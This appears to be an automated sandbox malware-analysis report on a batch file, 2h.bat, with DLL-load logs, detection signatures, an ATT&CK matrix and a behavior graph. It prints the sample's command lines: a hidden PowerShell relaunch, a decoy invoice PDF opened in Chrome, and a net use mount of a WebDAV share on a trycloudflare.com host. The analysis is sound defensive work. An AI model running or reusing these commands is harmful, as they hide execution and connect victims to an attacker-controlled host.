Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3847Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5632Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 3847 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep count: 5632 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep count: 66 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5468Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\net.exe TID: 692Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: net.exe, 0000000C.00000002.1578721214.00000187946C0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1537477832.00000187946C0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1536962933.00000187946C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3u
Source: net.exe, 0000000C.00000002.1578721214.0000018794659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: net.exe, 0000000C.00000002.1578721214.00000187946C0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1537477832.00000187946C0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1536962933.00000187946C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\net.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yes
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yesJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
PowerShell
1
Scripting
11
Process Injection
11
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS21
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1647126 Sample: 2h.bat Startdate: 24/03/2025 Architecture: WINDOWS Score: 76 32 supplier-murray-custody-treasures.trycloudflare.com 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 Joe Sandbox ML detected suspicious sample 2->52 10 cmd.exe 1 2->10         started        signatures3 process4 signatures5 54 Suspicious powershell command line found 10->54 56 Gathers information about network shares 10->56 13 powershell.exe 12 10->13         started        15 conhost.exe 10->15         started        process6 process7 17 cmd.exe 14 13->17         started        signatures8 44 Gathers information about network shares 17->44 20 chrome.exe 2 17->20         started        23 net.exe 7 17->23         started        25 conhost.exe 17->25         started        27 net.exe 1 17->27         started        process9 dnsIp10 34 192.168.2.4, 138, 443, 49182 unknown unknown 20->34 29 chrome.exe 20->29         started        36 supplier-murray-custody-treasures.trycloudflare.com 104.16.231.132, 443, 49722, 49733 CLOUDFLARENETUS United States 23->36 process11 dnsIp12 38 www.google.com 142.251.40.196, 443, 49734, 49740 GOOGLEUS United States 29->38 40 healyconsultants.com 162.159.134.42, 443, 49725 CLOUDFLARENETUS United States 29->40 42 www.healyconsultants.com 29->42

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2h.bat11%VirustotalBrowse
2h.bat11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://supplier-murray-custody-treasures.trycloudflare.com/0%Avira URL Cloudsafe
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfr0%Avira URL Cloudsafe
https://supplier-murray-custody-treasures.trycloudflare.com//0%Avira URL Cloudsafe
https://www.healyconsultants.com/wp-content/upl0W0%Avira URL Cloudsafe
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfVk0%Avira URL Cloudsafe
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf0%Avira URL Cloudsafe
https://supplier-murray-custody-treasures.trycloudflare.com/K0%Avira URL Cloudsafe
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
healyconsultants.com
162.159.134.42
truefalse
    unknown
    supplier-murray-custody-treasures.trycloudflare.com
    104.16.231.132
    truetrue
      unknown
      www.google.com
      142.251.40.196
      truefalse
        high
        www.healyconsultants.com
        unknown
        unknownfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
